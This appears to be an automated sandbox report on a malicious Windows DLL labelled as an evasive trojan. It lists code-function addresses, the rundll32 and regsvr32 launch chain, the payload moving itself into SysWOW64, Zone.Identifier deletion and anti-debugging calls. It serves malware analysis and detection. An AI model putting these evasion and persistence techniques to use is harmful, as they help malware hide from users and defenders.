Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048ECAD5	5_2_048ECAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F00EF	5_2_048F00EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DF0E9	5_2_048DF0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F3EE9	5_2_048F3EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EE4E5	5_2_048EE4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EBEFD	5_2_048EBEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E8806	5_2_048E8806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E9A01	5_2_048E9A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DB820	5_2_048DB820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D3431	5_2_048D3431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E4244	5_2_048E4244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DE640	5_2_048DE640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EF840	5_2_048EF840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D7442	5_2_048D7442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E2E5D	5_2_048E2E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F0A64	5_2_048F0A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F3263	5_2_048F3263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D7E79	5_2_048D7E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D7078	5_2_048D7078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E567B	5_2_048E567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EA474	5_2_048EA474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DA871	5_2_048DA871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EDC71	5_2_048EDC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D238C	5_2_048D238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DFB8E	5_2_048DFB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E0F86	5_2_048E0F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E6187	5_2_048E6187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E3D85	5_2_048E3D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D2194	5_2_048D2194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E8FAE	5_2_048E8FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F07AA	5_2_048F07AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D77A3	5_2_048D77A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048ED1BC	5_2_048ED1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DBFBE	5_2_048DBFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D57B8	5_2_048D57B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EFBDE	5_2_048EFBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DE7DE	5_2_048DE7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EC5D5	5_2_048EC5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E67E6	5_2_048E67E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D4BFC	5_2_048D4BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D55FF	5_2_048D55FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048EE1F8	5_2_048EE1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E27F9	5_2_048E27F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E07F4	5_2_048E07F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E9DF5	5_2_048E9DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DEF0C	5_2_048DEF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F2B09	5_2_048F2B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E5515	5_2_048E5515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E8D3D	5_2_048E8D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D1F38	5_2_048D1F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E5333	5_2_048E5333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DD14C	5_2_048DD14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E7D5B	5_2_048E7D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048F2D53	5_2_048F2D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DF369	5_2_048DF369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E437A	5_2_048E437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E017B	5_2_048E017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E5779	5_2_048E5779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D6B7A	5_2_048D6B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E4F74	5_2_048E4F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048E9774	5_2_048E9774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F7A0F	7_2_008F7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00902009	7_2_00902009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E8636	7_2_008E8636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EA445	7_2_008EA445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F4A66	7_2_008F4A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EDE74	7_2_008EDE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FEFDD	7_2_008FEFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EC5D8	7_2_008EC5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E670B	7_2_008E670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FAD08	7_2_008FAD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F654A	7_2_008F654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F2142	7_2_008F2142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FFF58	7_2_008FFF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F3EAA	7_2_008F3EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EBAA9	7_2_008EBAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FA2A5	7_2_008FA2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_009046BD	7_2_009046BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E1CA1	7_2_008E1CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F0EBC	7_2_008F0EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F0ABA	7_2_008F0ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EC6B8	7_2_008EC6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_009036AA	7_2_009036AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E80C0	7_2_008E80C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FD8DB	7_2_008FD8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FCCD9	7_2_008FCCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FCAD5	7_2_008FCAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EF0E9	7_2_008EF0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FE4E5	7_2_008FE4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FBEFD	7_2_008FBEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00903EE9	7_2_00903EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_009000EF	7_2_009000EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F8806	7_2_008F8806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F9A01	7_2_008F9A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EB820	7_2_008EB820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E3431	7_2_008E3431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F4244	7_2_008F4244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E7442	7_2_008E7442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EE640	7_2_008EE640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FF840	7_2_008FF840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F2E5D	7_2_008F2E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FB257	7_2_008FB257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00903263	7_2_00903263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00900A64	7_2_00900A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F567B	7_2_008F567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E7078	7_2_008E7078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E7E79	7_2_008E7E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FA474	7_2_008FA474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FDC71	7_2_008FDC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EA871	7_2_008EA871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EFB8E	7_2_008EFB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E238C	7_2_008E238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F6187	7_2_008F6187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F0F86	7_2_008F0F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F3D85	7_2_008F3D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E2194	7_2_008E2194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F8FAE	7_2_008F8FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_009017BD	7_2_009017BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E77A3	7_2_008E77A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EBFBE	7_2_008EBFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FD1BC	7_2_008FD1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E57B8	7_2_008E57B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_009007AA	7_2_009007AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EE7DE	7_2_008EE7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FFBDE	7_2_008FFBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FC5D5	7_2_008FC5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F67E6	7_2_008F67E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F85FF	7_2_008F85FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E55FF	7_2_008E55FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E4BFC	7_2_008E4BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F27F9	7_2_008F27F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FE1F8	7_2_008FE1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F9DF5	7_2_008F9DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F07F4	7_2_008F07F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EEF0C	7_2_008EEF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00902B09	7_2_00902B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F5515	7_2_008F5515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F8D3D	7_2_008F8D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E1F38	7_2_008E1F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F5333	7_2_008F5333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008ED14C	7_2_008ED14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00902D53	7_2_00902D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F7D5B	7_2_008F7D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008FE955	7_2_008FE955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EF369	7_2_008EF369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E6B7A	7_2_008E6B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F017B	7_2_008F017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F437A	7_2_008F437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F5779	7_2_008F5779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F4F74	7_2_008F4F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008F9774	7_2_008F9774

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001984C appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001984C appears 48 times

Source: EcJ8rbg.dll

Binary or memory string: OriginalFilenameUDPTool.EXE: vs EcJ8rbg.dll

Source: EcJ8rbg.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: EcJ8rbg.dll

Virustotal: Detection: 40%

Source: EcJ8rbg.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\EcJ8rbg.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\EcJ8rbg.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj",GacrURwyZJOcX
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Twpdaikokj\mcaqvcjuoohw.tdj",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\EcJ8rbg.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\EcJ8rbg.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj",GacrURwyZJOcX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Twpdaikokj\mcaqvcjuoohw.tdj",DllRegisterServer	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@21/2@0/27

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\EcJ8rbg.dll",#1

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100126F9 FindResourceA,LoadResource,LockResource,FreeResource,

2_2_100126F9

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: EcJ8rbg.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: EcJ8rbg.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: EcJ8rbg.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: EcJ8rbg.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: EcJ8rbg.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10019891 push ecx; ret	2_2_100198A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10017C60 push ecx; ret	2_2_10017C73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B31195 push cs; iretd	2_2_04B31197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10019891 push ecx; ret	3_2_100198A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10017C60 push ecx; ret	3_2_10017C73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04241195 push cs; iretd	3_2_04241197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048D1195 push cs; iretd	5_2_048D1197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008E1195 push cs; iretd	7_2_008E1197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_10023A79

Source: EcJ8rbg.dll

Static PE information: real checksum: 0x66354 should be: 0x6aec8

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\EcJ8rbg.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Twpdaikokj\mcaqvcjuoohw.tdj:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Jicbdwjegkdwrax\kyymjqgoejyy.lye:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_1000D804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	2_2_10008B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_1000D804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_10008B90

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 2432

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 4.9 %

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_2-20911
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-21800

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: svchost.exe, 00000011.00000002.782416042.00000289AE082000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.782568304.00000289AE0EC000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_1001C49A

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_10023A79

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

2_2_100178B6

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B3F7F7 mov eax, dword ptr fs:[00000030h]	2_2_04B3F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0424F7F7 mov eax, dword ptr fs:[00000030h]	3_2_0424F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_048DF7F7 mov eax, dword ptr fs:[00000030h]	5_2_048DF7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_008EF7F7 mov eax, dword ptr fs:[00000030h]	7_2_008EF7F7

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1001C49A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10021743
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_100167D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	2_2_1001FC21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	2_2_1001FC43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1001C49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10021743
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_100167D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	3_2_1001FC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	3_2_1001FC43

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

